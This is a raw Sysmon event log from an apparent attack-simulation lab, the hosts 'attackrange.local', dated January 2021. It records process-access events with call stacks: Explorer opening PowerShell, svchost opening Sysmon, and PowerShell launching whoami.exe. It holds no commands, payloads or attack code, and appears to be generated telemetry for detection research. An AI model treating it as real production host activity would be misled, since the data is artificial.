22:12:57.054{FF16AF91-26E1-6013-8B00-00000000A401}30366280C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9600-00000000A401}4668C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032908Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:57.054{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9700-00000000A401}5796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032907Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:57.054{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9700-00000000A401}5796C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032906Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:57.054{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9700-00000000A401}5796C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032905Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:57.054{FF16AF91-26E1-6013-8B00-00000000A401}30365032C:\Windows\Explorer.EXE{FF16AF91-26EB-6013-9700-00000000A401}5796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000361149Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361148Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361147Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1600-000000001100}1356C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\lsm.dll+1a207|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d 10341000x8000000000000000361146Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361145Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-1600-000000001100}1356C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\lsm.dll+1a207|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d 10341000x8000000000000000361144Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361143Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f97f|c:\windows\system32\lsm.dll+f7ad|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361142Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f6ba|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361141Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f97f|c:\windows\system32\lsm.dll+f7ad|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361140Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+f6ba|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361139Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361138Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361137Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:00.017{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000032926Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.725{FF16AF91-26EB-6013-9700-00000000A401}57963100C:\Windows\system32\conhost.exe{FF16AF91-36ED-6013-7B03-00000000A401}4860C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032925Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.725{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032924Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.725{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032923Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.725{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032922Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.725{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032921Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.725{FF16AF91-26BA-6013-2300-00000000A401}28122960C:\Windows\system32\csrss.exe{FF16AF91-36ED-6013-7B03-00000000A401}4860C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032920Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.725{FF16AF91-26EB-6013-9600-00000000A401}46684068C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{FF16AF91-36ED-6013-7B03-00000000A401}4860C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5f0632a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e522e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5064ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e50635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4f82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e5043b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e504133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e503e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5efb5469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+5e4c499a(wow64) 154100x800000000000000032919Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:01.727{FF16AF91-36ED-6013-7B03-00000000A401}4860C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft 